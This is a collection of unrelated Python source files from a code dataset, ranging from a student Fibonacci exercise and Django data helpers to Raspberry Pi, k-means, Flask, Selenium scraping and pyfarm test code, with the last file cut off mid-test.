+{"seq_id":"498213864","text":"#Jon Cracolici\n#Lesson 2 Series Problems\n#UW Python Cert\ndef fibonacci(n):\n \"\"\"Returns Fibonacci Sequence value at 'n' index, with indexing starting at 0.\n arg1 = n = index of the value you wish to be returned.\n \"\"\"\n try:\n if n>=0 and (n%int(n)==0.0) == True:\n pass\n else:\n print('Please use a natural number')\n return\n except:\n print('Please use a natural number')\n return\n intcheck = int(n)\n if intcheck == 0:\n return 0\n elif intcheck == 1:\n return 1\n fsequence = list(range(intcheck+1))\n for i in fsequence[2:]:\n fsequence[i] = fsequence[i-1] + fsequence[i-2]\n return fsequence[intcheck]\nfibonacci(6)\ndef lucas(n):\n \"\"\"Returns Lucas Sequence value at 'n' index, with indexing starting at 0.\n arg1 = n = index of the value you wish to be returned.\n \"\"\" \n try:\n if n>=0 and (n%int(n)==0.0) == True:\n pass\n else:\n print('Please use a natural number')\n return\n except:\n print('Please use a natural number')\n return\n intcheck=int(n)\n if intcheck == 0:\n return 2\n elif intcheck == 1:\n return 1\n lsequence = list(range(intcheck+1))\n lsequence[0]=2\n for i in lsequence[2:]:\n lsequence[i] = lsequence[i-1] + lsequence[i-2]\n #print(lsequence[n])\n #print(lsequence)\n return lsequence[intcheck]\nlucas(6)\ndef sum_series(n, a=0, b=1):\n \"\"\"Returns the value of recursively additive seq at 'n' index,\n defaults to fibonacci. you may use kwargs 'a' and 'b' to set the \n values of the first two indicies.\n arg1 = n = index of the value you wish to be returned.\n kwarg1 = a = value of sequence at index 0.\n kwarg2 = b = value of sequence at index 1.\n \"\"\"\n try:\n if n>=0 and (n%int(n)==0.0) == True:\n pass\n else:\n print('Please use a natural number')\n return\n except:\n print('Please use a natural number')\n return\n intcheck = int(n)\n if intcheck == 0:\n return a\n elif intcheck == 1:\n return b\n sslist = list(range(intcheck+1))\n sslist[0] = a\n sslist[1] = b\n for i in sslist[2:]:\n sslist[i] = sslist[i-1] + sslist[i-2]\n return sslist[intcheck]\nsum_series(6.5, a=2, b=1)\n#This block of code is used to assert that the functions provide\n#the correct answers for index = 6, and also that the sum_series\n#function can create either the fibonacci or lucas series.\n\nassert fibonacci(6)==8\nassert lucas(6)==18\nassert sum_series(6)==fibonacci(6)\nassert sum_series(6, a=2, b=1)==lucas(6)","sub_path":"students/Cracolici_Jon/lesson02/JonCracolici_Lesson2_Series.py","file_name":"JonCracolici_Lesson2_Series.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"306193844","text":"from arsenal.alphabet import Alphabet\nfrom collections import Counter, defaultdict\nfrom vocrf.util import prefixes, suffixes, ngram_counts\nfrom arsenal import iterview\n\n\nclass Dataset(object):\n\n def __init__(self, train, dev, test):\n self.train = train\n self.dev = dev\n self.test = test\n # indexes will be populated by `_index`.\n self.Y = Alphabet() # tag set\n self.V = Alphabet() # vocabulary\n self.V_freq = Counter() # token unigram counts\n self.V2Y = defaultdict(set) # tag dictionary\n self.prefixes = Counter()\n self.suffixes = Counter()\n self._index(self.train)\n\n def _index(self, data):\n \"frequency tables, etc.\"\n for sentence in data:\n for y, w in sentence:\n self.Y.add(y)\n self.V.add(w)\n self.V2Y[w].add(y)\n self.V_freq[w] += 1\n for prefix in prefixes(w):\n self.prefixes[prefix] += 1\n for suffix in suffixes(w):\n self.suffixes[suffix] += 1\n\n def make_instances(self, fold, cls):\n \"Convert tuples in data `fold` to instances of `cls`.\"\n data = []\n for x in iterview(getattr(self, fold), msg='Features (%s)' % fold):\n tags, tokens = list(zip(*x))\n data.append(cls(tokens, self.Y.map(tags), self))\n return data\n\n def tag_ngram_counts(self, n):\n \"Returns tag ngram count for subsequences of length n.\"\n\n# Y = self.Y\n\n def tag_sequences():\n \"\"\"Iterate over tag sequence (as `str` instead of `int`, which is how they are\n stored.).\n\n \"\"\"\n for e in self.train:\n y, _ = list(zip(*e))\n# assert all(isinstance(yy, int) for yy in y), y\n# yield tuple(Y.lookup_many(y))\n yield y\n\n return ngram_counts(tag_sequences(), n)\n","sub_path":"vocrf/ner/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"523607751","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, print_function\n\nimport pandas as pd\nfrom django.conf import settings\n\nfrom action.models import Condition, Action\nfrom dataops import formula_evaluation\nfrom dataops.pandas_db import (\n create_table_name,\n create_upload_table_name,\n store_table,\n df_column_types_rename,\n load_table,\n get_table_data,\n is_table_in_db,\n get_table_queryset,\n pandas_datatype_names)\nfrom table.models import View\nfrom workflow.models import Workflow, Column\n\n\ndef is_unique_column(df_column):\n \"\"\"\n\n :param df_column: Column of a pandas data frame\n :return: Boolean encoding if the column has unique values\n \"\"\"\n return len(df_column.unique()) == len(df_column)\n\n\ndef are_unique_columns(data_frame):\n \"\"\"\n\n :param data_frame: Pandas data frame\n :return: Array of Booleans stating of a column has unique values\n \"\"\"\n return [is_unique_column(data_frame[x]) for x in list(data_frame.columns)]\n\n\ndef load_upload_from_db(pk):\n return load_table(create_upload_table_name(pk))\n\n\ndef store_table_in_db(data_frame, pk, table_name, temporary=False):\n \"\"\"\n Update or create a table in the DB with the data in the data frame. It\n also updates the corresponding column information\n\n :param data_frame: Data frame to dump to DB\n :param pk: Corresponding primary key of the workflow\n :param table_name: Table to use in the DB\n :param temporary: Boolean stating if the table is temporary,\n or it belongs to an existing workflow.\n :return: If temporary = True, then return a list with three lists:\n - column names\n - column types\n - column is unique\n If temporary = False, return None. All this info is stored in\n the workflow\n \"\"\"\n\n if settings.DEBUG:\n print('Storing table ', table_name)\n\n # get column names and types\n df_column_names = list(data_frame.columns)\n df_column_types = df_column_types_rename(data_frame)\n\n # if the data frame is temporary, the procedure is much simpler\n if temporary:\n # Get the if the columns have unique values per row\n column_unique = are_unique_columns(data_frame)\n\n # Store the table in the DB\n store_table(data_frame, table_name)\n\n # Return a list with three list with information about the\n # data frame that will be needed in the next steps\n return [df_column_names, df_column_types, column_unique]\n\n # We are modifying an existing DF\n\n # Get the workflow and its columns\n workflow = Workflow.objects.get(id=pk)\n wf_col_names = Column.objects.filter(\n workflow__id=pk\n ).values_list(\"name\", flat=True)\n\n # Loop over the columns in the data frame and reconcile the column info\n # with the column objects attached to the WF\n for cname in df_column_names:\n # See if this is a new column\n if cname in wf_col_names:\n # If column already exists in wf_col_names, no need to do anything\n continue\n\n # Create the new column\n Column.objects.create(\n name=cname,\n workflow=workflow,\n data_type=pandas_datatype_names[\n data_frame[cname].dtype.name],\n is_key=is_unique_column(data_frame[cname]))\n\n # Get now the new set of columns with names\n wf_column_names = Column.objects.filter(\n workflow__id=pk).values_list('name', flat=True)\n\n # Reorder the columns in the data frame\n data_frame = data_frame[list(wf_column_names)]\n\n # Store the table in the DB\n store_table(data_frame, table_name)\n\n # Update workflow fields and save\n workflow.nrows = data_frame.shape[0]\n workflow.ncols = data_frame.shape[1]\n workflow.set_query_builder_ops()\n workflow.data_frame_table_name = table_name\n workflow.save()\n\n return None\n\n\ndef store_dataframe_in_db(data_frame, pk):\n \"\"\"\n Given a dataframe and the primary key of a workflow, it dumps its content on\n a table that is rewritten every time.\n\n :param data_frame: Pandas data frame containing the data\n :param pk: The unique key for the workflow\n :return: Nothing. Side effect in the database\n \"\"\"\n return store_table_in_db(data_frame, pk, create_table_name(pk))\n\n\ndef store_upload_dataframe_in_db(data_frame, pk):\n \"\"\"\n Given a dataframe and the primary key of a workflow, it dumps its content on\n a table that is rewritten every time.\n\n :param data_frame: Pandas data frame containing the data\n :param pk: The unique key for the workflow\n :return: If temporary = True, then return a list with three lists:\n - column names\n - column types\n - column is unique\n If temporary = False, return None. All this infor is stored in\n the workflow\n \"\"\"\n return store_table_in_db(data_frame,\n pk,\n create_upload_table_name(pk),\n True)\n\n\ndef get_table_row_by_index(workflow, cond_filter, idx):\n \"\"\"\n Select the set of elements in the row with the given index\n\n :param workflow: Workflow object storing the data\n :param cond_filter: Condition object to filter the data (or None)\n :param idx: Row number to get (first row is idx = 1)\n :return: A dictionary with the (column_name, value) data or None if the\n index is out of bounds\n \"\"\"\n\n # Get the data\n data = get_table_data(workflow.id, cond_filter)\n\n # If the data is not there, return None\n if idx > len(data):\n return None\n\n return dict(zip(workflow.get_column_names(), data[idx - 1]))\n\n\ndef workflow_has_table(workflow_item):\n return is_table_in_db(create_table_name(workflow_item.id))\n\n\ndef workflow_id_has_table(workflow_id):\n return is_table_in_db(create_table_name(workflow_id))\n\n\ndef workflow_has_upload_table(workflow_item):\n return is_table_in_db(\n create_upload_table_name(workflow_item.id)\n )\n\n\ndef get_queryset_by_workflow(workflow_item):\n return get_table_queryset(create_table_name(workflow_item.id))\n\n\ndef get_queryset_by_workflow_id(workflow_id):\n return get_table_queryset(create_table_name(workflow_id))\n\n\ndef perform_dataframe_upload_merge(pk, dst_df, src_df, merge_info):\n \"\"\"\n It either stores a data frame in the db (dst_df is None), or merges\n the two data frames dst_df and src_df and stores its content.\n\n :param pk: Primary key of the Workflow containing the data frames\n :param dst_df: Destination dataframe (already stored in DB)\n :param src_df: Source dataframe, stored in temporary table\n :param merge_info: Dictionary with merge options\n :return:\n \"\"\"\n\n # STEP 1 Rename the column names.\n src_df = src_df.rename(\n columns=dict(zip(merge_info['initial_column_names'],\n merge_info.get('autorename_column_names', None) or\n merge_info['rename_column_names'])))\n\n # STEP 2 Drop the columns not selected\n columns_to_upload = merge_info['columns_to_upload']\n src_df.drop([n for x, n in enumerate(list(src_df.columns))\n if not columns_to_upload[x]],\n axis=1, inplace=True)\n\n # If no dst_df is given, simply dump the frame in the DB\n if dst_df is None:\n store_dataframe_in_db(src_df, pk)\n return None\n\n # Step 3. Drop the columns that are going to be overriden.\n dst_df.drop(merge_info['override_columns_names'],\n inplace=True,\n axis=1)\n # Step 4. Perform the merge\n try:\n new_df = pd.merge(dst_df,\n src_df,\n how=merge_info['how_merge'],\n left_on=merge_info['dst_selected_key'],\n right_on=merge_info['src_selected_key'])\n except Exception as e:\n return 'Merge operation failed. Exception: ' + e.message\n\n # If the merge produced a data frame with no rows, flag it as an error to\n # prevent loosing data when there is a mistake in the key column\n if new_df.shape[0] == 0:\n return 'Merge operation produced a result with no rows'\n\n # For each column, if it is overriden, remove it, if not, check that the\n # new column is consistent with data_type, and allowed values,\n # and recheck its unique key status\n for col in Workflow.objects.get(pk=pk).columns.all():\n # If column is overriden, remove it\n if col.name in merge_info['override_columns_names']:\n col.delete()\n continue\n\n # New values in this column should be compatible with the current\n # column properties.\n # Condition 1: Data type\n if pandas_datatype_names[new_df[col.name].dtype.name] != col.data_type:\n return 'New values in column ' + col.name + ' are not of type ' \\\n + col.data_type\n\n # Condition 2: If there are categories, the new values should be\n # compatible with them.\n if col.categories and not all([x in col.categories\n for x in new_df[col.name]]):\n return 'New values in column ' + col.name + ' are not within ' \\\n + 'the categories ' + ', '.join(col.categories)\n\n # Condition 3:\n col.is_key = is_unique_column(new_df[col.name])\n\n # Store the result back in the DB\n store_dataframe_in_db(new_df, pk)\n\n # Operation was correct, no need to flag anything\n return None\n\n\ndef data_frame_add_empty_column(df, column_name, column_type, initial_value):\n \"\"\"\n\n :param df: Data frame to modify\n :param column_name: Name of the column to add\n :param column_type: type of the column to add\n :param initial_value: initial value in the column\n :return: new data frame with the additional column\n \"\"\"\n\n # How to add a new column with a specific data type in DataFrame\n # a = np.empty((10,), dtype=[('column_name', np.float64)])\n # b = np.empty((10,), dtype=[('nnn', np.float64)] (ARRAY)\n # pd.concat([df, pd.DataFrame(b)], axis=1)\n\n if not initial_value:\n # Choose the right numpy type\n if column_type == 'string':\n initial_value = ''\n elif column_type == 'integer':\n initial_value = 0\n elif column_type == 'double':\n initial_value = 0.0\n elif column_type == 'boolean':\n initial_value = False\n elif column_type == 'datetime':\n initial_value = pd.NaT\n else:\n raise ValueError('Type ' + column_type + ' not found.')\n\n # Create the empty column\n df[column_name] = initial_value\n\n return df\n\n\ndef rename_df_column(df, workflow, old_name, new_name):\n \"\"\"\n Function to change the name of a column in the dataframe.\n\n :param df: dataframe\n :param workflow: workflow object that is handling the data frame\n :param old_name: old column name\n :param new_name: new column name\n :return: Workflow object updated\n \"\"\"\n\n # Rename the appearances of the variable in all conditions/filters\n conditions = Condition.objects.filter(action__workflow=workflow)\n for cond in conditions:\n cond.formula = formula_evaluation.rename_variable(\n cond.formula, old_name, new_name)\n cond.save()\n\n # Rename the appearances of the variable in all actions\n for action_item in Action.objects.filter(workflow=workflow):\n action_item.rename_variable(old_name, new_name)\n\n # Rename the appearances of the variable in the formulas in the views\n for view in View.objects.filter(workflow=workflow):\n view.formula = formula_evaluation.rename_variable(\n view.formula,\n old_name,\n new_name\n )\n view.save()\n\n return df.rename(columns={old_name: new_name})\n\n\ndef detect_datetime_columns(data_frame):\n \"\"\"\n Given a data frame traverse the columns and those that have type \"string\"\n try to see if it is of type datetime. If so, apply the translation.\n :param data_frame: Pandas dataframe to detect datetime columns\n :return:\n \"\"\"\n # Strip white space from all string columns and try to convert to\n # datetime just in case\n for x in list(data_frame.columns):\n if data_frame[x].dtype.name == 'object':\n # Column is a string!\n data_frame[x] = data_frame[x].str.strip()\n\n # Try the datetime conversion\n try:\n series = pd.to_datetime(data_frame[x],\n infer_datetime_format=True)\n # Datetime conversion worked! Update the data_frame\n data_frame[x] = series\n except ValueError:\n pass\n return data_frame\n","sub_path":"src/dataops/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":12768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"635852042","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(2, GPIO.IN)\nGPIO.setup(22, GPIO.OUT)\ncount = 0\n\n\ntry:\n while True:\n input_state = GPIO.input(2)\n print(input_state)\n if input_state == GPIO.LOW:\n count = count + 1\n print('Button pressed ' + str(count) +' times')\n GPIO.output(22, GPIO.LOW)\n time.sleep(0.1)\n GPIO.output(22, GPIO.HIGH)\nexcept KeyboardInterrupt:\n print('Quit')\n GPIO.cleanup()\n\n","sub_path":"PENSS/rasbery/lat3.py","file_name":"lat3.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"550042632","text":"\n\ndef menu(): \n print(\"[1] Add to-do list\") \n print(\"[2] View to-do list\")\n print(\"[3] Exit\")\n\n \n userinput = int(input(\"\"))\n \n \n if userinput == 1:\n addToDo()\n elif userinput == 2:\n viewToDo()\n elif userinput == 3: \n return()\n\n\ndef viewToDo(): \n file = open(\"todolist.txt\", \"r\")\n\n if file.read() == \"\": \n print(\"There are no to-dos!\")\n menu() \n return 0\n else: \n file.seek(0) \n print(\"##### To-do list #####\") \n num = 1 \n for list in file: \n list = list.split(\"#\")\n print(\"[{}] {}\".format(num, list[0]))\n num += 1 \n \n print(\"[0] Main menu\")\n file.close() \n con = int(input(\"\"))\n\n if con == 0: \n menu()\n else:\n viewTodoContents(con)\n\n\ndef viewTodoContents(pos):\n file = open(\"todolist.txt\", 'r') #open file as reading\n\n for list in file:\n if x == pos: \n title_and_content = list.split(\"#\") \n for index, content in enumerate(title_and_content, start=1): \n if index == 1: \n print(\"##### {} #####\".format(content))\n else: \n print(\"{}. {}\".format(index-1, content))\n x += 1 \n print(\"[1] Go back\")\n print(\"[0] Main menu\")\n file.close() \n con = int(input(\"\")) \n\n if con == 0:\n menu()\n elif con == 1:\n viewToDo()\n\n\n\ndef addToDo():\n print(\"##### To-do list #####\") \n listcontent = [] \n title = input(\"Title:\") \n x = 1 \n while True:\n content = input(\"{}. \".format(x)) \n if content == \"0\": \n break\n else: \n listcontent.append(content)\n x += 1 \n saveToDo(title, listcontent) \n\n\ndef saveToDo(title, listcontent): \n newTodo = title \n\n for content in listcontent: \n newTodo += \"#{}\".format(content) \n\n file = open(\"todolist.txt\", \"a\") \n file.write(newTodo+\"\\n\") \n file.close()\n\n print(\"To-do list added\")\n menu() \n\n\nmenu()\n","sub_path":"group_act3.py","file_name":"group_act3.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"233519052","text":"# Linear Search\n\ndef linear_search(values, target):\n\tindex = 0\n\tsearch_res = False\n\n\twhile index < len(values) and search_res is False:\n\t\tif values[index] == target:\n\t\t\tsearch_res = True\n\t\telse:\n\t\t\tindex += 1\n\treturn search_res\n\nlist = [1, 23, 16, 57, 34, 97]\nprint(linear_search(list,12))","sub_path":"searching_algorithms/linear_search.py","file_name":"linear_search.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"206859484","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2020 Bitdefender\n# SPDX-License-Identifier: Apache-2.0\n#\n\nimport os\n\nfrom codecs import open\n\nfrom setuptools import find_packages, setup, Command, Extension\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\npackages = ['pydis']\n\nrequires = [\n\t\"setuptools\"\n]\n\nabout = {}\nwith open(os.path.join(here, 'pydis', '__version__.py'), 'r', 'utf-8') as f:\n exec(f.read(), about)\n\nwith open('README.md', 'r', 'utf-8') as f:\n readme = f.read()\n\nsetup(\n name=about['__title__'],\n version=about['__version__'],\n packages=packages,\n package_data={'': ['LICENSE', 'NOTICE'], 'pydis': ['*.pem']},\n package_dir={'pydis': 'pydis'},\n include_package_data=True,\n python_requires=\">=3.4\",\n setup_requires=['wheel'],\n install_requires=requires,\n zip_safe=False,\n classifiers=[\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Programming Language :: Python :: Implementation :: PyPy'\n ],\n ext_modules = [Extension(\"_pydis\",\n sources = [\"_pydis/_pydis.c\", \"_pydis/pydis.c\"],\n define_macros = [('AMD64', None), ('PYDIS_BUILD', None)],\n include_dirs = ['../inc'],\n libraries = ['bddisasm'],\n library_dirs = ['../bin/x64/Release'])]\n)\n","sub_path":"pydis/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"584170415","text":"from mrjob.job import MRJob\nfrom mrjob.job import MRStep\nimport mrjob\nimport sqlite3\nimport math\nimport numpy as np\n\ndef dist(P,C):\n return sum([abs(p - float(c)) ** 2 for p,c in zip(P, C)])\n\nclass KMeans(MRJob):\n OUTPUT_PROTOCOL = mrjob.protocol.RawProtocol\n\n def configure_args(self):\n #Define input file, output file and number of iteration\n super(KMeans, self).configure_args()\n self.add_file_arg('--database')\n #self.add_passthrough_option('--iterations', dest='iterations', default=10, type='int')\n def mapper_loader(self, _, line):\n yield None,line\n def reducer_loader(self,key,values):\n input=\"\"\n for value in values:\n input+=value\n input+=\"¤\"\n yield None,input\n def mapper_init(self):\n self.sqlite_conn = sqlite3.connect(self.options.database)\n self.c = self.sqlite_conn.cursor()\n def mapper(self, _, line):\n centroids=line.split(\"¤\")\n centroids=centroids[:-1]\n points=self.c.execute(\"SELECT (score1-(SELECT min(score1) from Wiki))/((SELECT max(score1) from Wiki)-(SELECT min(score1) from Wiki)),(score2-(SELECT min(score2) from Wiki))/((SELECT max(score2) from Wiki)-(SELECT min(score2) from Wiki)),(score3-(SELECT min(score3) from Wiki))/((SELECT max(score3) from Wiki)-(SELECT min(score3) from Wiki)),(score4-(SELECT min(score4) from Wiki))/((SELECT max(score4) from Wiki)-(SELECT min(score4) from Wiki)) from Wiki\")\n for point in points:\n min=-1\n mindist=1000000000\n d=0\n for i in range(len(centroids)):\n d=dist(point,centroids[i].split(\",\"))\n if d c_amount)\n\n return Response({'data': serializer.data, 'isMoreComments': is_more})\n\n","sub_path":"project/comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"222911511","text":"#http://stackoverflow.com/questions/5870188/does-flask-support-regular-expressions-in-its-url-routing\n#Even though Armin beat me to the punch with an accepted answer I thought I'd show an abbreviated example of how I implemented a regex matcher in Flask just in case anyone wants a working example of how this could be done.\n\nfrom flask import Flask\nfrom werkzeug.routing import BaseConverter\n\napp = Flask(__name__)\n\nclass RegexConverter(BaseConverter):\n def __init__(self, url_map, *items):\n super(RegexConverter, self).__init__(url_map)\n self.regex = items[0]\n\n\napp.url_map.converters['regex'] = RegexConverter\n\n@app.route('/-/')\ndef example(uid, slug):\n return \"uid: %s, slug: %s\" % (uid, slug)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=5000)\n\n#this URL should return with 200: http://localhost:5000/abc0-foo/\n#this URL should will return with 404: http://localhost:5000/abcd-foo/","sub_path":"all-gists/5743138/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"408044662","text":"from python.component.Component import Component\n\nclass GridSearchComponent(Component):\n selectors = {\n \"dropdown_search_field\": \"id=searchField_chzn\",\n \"search_label\": \"xpath=.//div[@class='input text']//*[text()='Search']\",\n \"input_value_search\": \"id=searchValue\",\n \"button_search\": \"xpath=//button[contains(@class,'btn-search')]\",\n \"send_to\": \"id=sendToList_chzn\",\n \"start_date\": \"id=start_date_on_time\",\n \"end_date\": \"id=end_date_on_time\"\n }\n \n def select_dropdown_search_field(self, field_name):\n locator_dropdown_search_field = self.resolve_selector(\"dropdown_search_field\")\n self.select_dropdown(locator_dropdown_search_field, field_name)\n return self\n\n def input_value_search(self, value):\n return self.input_text(\"input_value_search\", value)\n \n def input_value_start_day(self, value):\n return self.input_text(\"start_date\", value)\n \n def input_value_end_date(self, value):\n return self.input_text(\"end_date\", value)\n\n def click_button_grid_search(self):\n self.click_element(\"button_search\")\n return self\n\n def search_item(self, field, value=None):\n self.select_dropdown_search_field(field)\n if value is not None:\n self.input_value_search(value)\n self.click_button_grid_search()\n self._wait_to_load()\n return self\n \n def search_item_via_date_time(self, field, start_day=None, end_day=None):\n self.select_dropdown_search_field(field)\n if start_day is not None:\n self.input_value_start_day(start_day)\n if end_day is not None:\n self.input_value_end_date(end_day)\n self.click_button_grid_search()\n self._wait_to_load()\n return self\n \n def search_item_via_option(self, field, option=None):\n self.select_dropdown_search_field(field)\n if option is not None:\n locator_dropdown_search_field = self.resolve_selector(\"send_to\")\n self.select_dropdown(locator_dropdown_search_field, option)\n self.click_button_grid_search()\n self._wait_to_load()\n return self\n \n def search_panel_should_contain(self):\n self.logger.info(\"Search panel should contain\")\n self.page_should_contain_element(\"search_label\")\n self.page_should_contain_element(\"input_value_search\")\n self.page_should_contain_element(\"dropdown_search_field\")\n self.page_should_contain_element(\"button_search\")\n return self\n\n","sub_path":"expense-ui-robot-tests/PythonExpenseAutomationTest/python/component/grid/GridSearchComponent.py","file_name":"GridSearchComponent.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"634279202","text":"from WMCore.Configuration import Configuration\nconfig = Configuration()\nconfig.section_('General')\nconfig.General.transferOutputs = True\nconfig.General.requestName = 'REQUESTNAME'\nconfig.section_('JobType')\nconfig.JobType.psetName = 'BTV-RunIIFall15DR76-00001_1_cfg.py'\n#config.JobType.inputFiles = ['../minbias.root']\n#config.JobType.outputFiles = ['output.root']\n#config.JobType.pyCfgParams = ['isData=0']\n#config.JobType.maxMemoryMB = 4000\nconfig.section_('Data')\nconfig.Data.totalUnits = -1\nconfig.Data.unitsPerJob = 1\nconfig.Data.splitting = 'FileBased'\nconfig.Data.publication = True\nconfig.Data.ignoreLocality = True\nconfig.Data.inputDataset = 'INPUTDATASET'\n#config.Data.inputDBS = 'phys03'\nconfig.Data.inputDBS = 'global'\nconfig.Data.outputDatasetTag = 'PUBLISHDATANAME'\nconfig.Data.publishDBS = 'https://cmsweb.cern.ch/dbs/prod/phys03/DBSWriter'\nconfig.Data.outLFNDirBase = 'OUTLFN'\nconfig.section_('User')\nconfig.section_('Site')\nconfig.Site.storageSite = 'T2_FR_IPHC'\n","sub_path":"SimProd/crabConfigTemplateGENSIMRAW.py","file_name":"crabConfigTemplateGENSIMRAW.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"40219932","text":"import time\nimport re\nimport selenium.common.exceptions\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\ndriver = webdriver.Chrome()\ndriver.get(r'http://www.cp79115.cn/tag/%E7%96%AB%E6%83%85')\nassert \"疫情\" in driver.title\n\ncount = 0\npages = 0\nfileName = 'covid_{:0>6d}.txt'.format(count)\n# 改为待保存目录\nsaveDir = r'/Users/fellno/0/Code/PyCharmProjects/DataMining/DataSets/TouTiao/疫情'\nnews_content = []\n\nwhile 1:\n try:\n # 显式等待页面加载\n element = WebDriverWait(driver, 60).until(EC.presence_of_element_located((By.TAG_NAME, \"h2\")))\n title = driver.find_elements_by_tag_name(\"h2\")\n contents = driver.find_elements_by_class_name(\"entry\")\n for i in range(len(title)):\n write_content = title[i].text + ' ' + contents[i].text\n write_content = re.sub(r'\\s*Tags: ', r' ', write_content)\n fileName = 'covid_{:0>6d}.txt'.format(count)\n with open(saveDir + '/' + fileName, 'w', encoding='utf8') as file:\n file.write(write_content)\n file.close()\n count += 1\n pages += 1\n print(\"{0} pages processed, {1} contents downloaded\".format(pages, count))\n try:\n nextPage = driver.find_element_by_xpath(r'//*[@id=\"content\"]/main/section/nav/div[2]/a')\n except selenium.common.exceptions.NoSuchElementException:\n break\n else:\n nextPage.click()\n except:\n driver.quit()\n","sub_path":"Selenium4Covid_210520.py","file_name":"Selenium4Covid_210520.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"13106413","text":"# No shebang line, this module is meant to be imported\n#\n# Copyright 2014 Oliver Palmer\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport re\nfrom collections import deque\nfrom datetime import datetime\nfrom os import urandom, remove\nfrom os.path import join, isfile, isdir, abspath\nfrom uuid import uuid4\n\nfrom twisted.internet import reactor\nfrom twisted.internet.defer import Deferred\n\nfrom pyfarm.core.enums import PY26\nfrom pyfarm.agent.config import config\nfrom pyfarm.agent.testutil import TestCase, skipIf\nfrom pyfarm.agent.utility import UnicodeCSVWriter\nfrom pyfarm.agent.sysinfo.cpu import total_cpus\nfrom pyfarm.jobtypes.core.log import (\n STDOUT, STDERR, STREAMS, CSVLog, LoggerPool, logpool)\n\n\nclass FakeProtocol(object):\n def __init__(self):\n self.uuid = uuid4()\n\n\nclass TestModuleLevel(TestCase):\n def test_stdout(self):\n self.assertEqual(STDOUT, 0)\n\n def test_stderr(self):\n self.assertEqual(STDERR, 1)\n\n def test_streams(self):\n self.assertEqual(STREAMS, set([STDERR, STDOUT]))\n\n\nclass TestCSVLog(TestCase):\n def setUp(self):\n super(TestCSVLog, self).setUp()\n self.log = CSVLog(open(self.create_file(), \"wb\"))\n\n @skipIf(PY26, \"Python 2.7+\")\n def test_lock_type(self):\n # same thread should have access to its own resources\n # can't use isinstance check....\n self.assertEqual(self.log.lock.__class__.__name__, \"_RLock\")\n\n def test_messages(self):\n self.assertIsInstance(self.log.messages, deque)\n self.assertEqual(self.log.messages, deque())\n\n def test_lines(self):\n self.assertEqual(self.log.lines, 0)\n\n def test_writer(self):\n self.assertIsInstance(self.log.csv, UnicodeCSVWriter)\n\n def test_file(self):\n self.assertIsInstance(self.log.file, file)\n\n def test_not_a_file(self):\n with self.assertRaises(TypeError):\n CSVLog(\"\")\n\n\nclass TestLoggerPool(TestCase):\n def setUp(self):\n super(TestLoggerPool, self).setUp()\n self.pool = None\n config[\"jobtype_logging_threadpool\"][\"min_threads\"] = 1\n config[\"jobtype_logging_threadpool\"][\"max_threads\"] = 2\n\n def tearDown(self):\n if self.pool is not None:\n self.pool.stop()\n\n def create_file(self, create=True):\n path = super(TestLoggerPool, self).create_file()\n if not create:\n remove(path)\n return path\n\n def test_existing_pool(self):\n self.assertIsInstance(logpool, LoggerPool)\n\n def test_invalid_minthreads(self):\n config[\"jobtype_logging_threadpool\"][\"min_threads\"] = 0\n\n with self.assertRaises(ValueError):\n LoggerPool()\n\n def test_auto_max_maxthreads(self):\n config[\"jobtype_logging_threadpool\"][\"max_threads\"] = \"auto\"\n pool = LoggerPool()\n self.assertEqual(\n pool.max, max(min(int(total_cpus() * 1.5), 20), pool.min))\n\n def test_minthreads_greater_than_maxthreads(self):\n config[\"jobtype_logging_threadpool\"][\"min_threads\"] = 5\n config[\"jobtype_logging_threadpool\"][\"max_threads\"] = 1\n\n with self.assertRaises(ValueError):\n LoggerPool()\n\n def test_protocol_already_open(self):\n protocol = 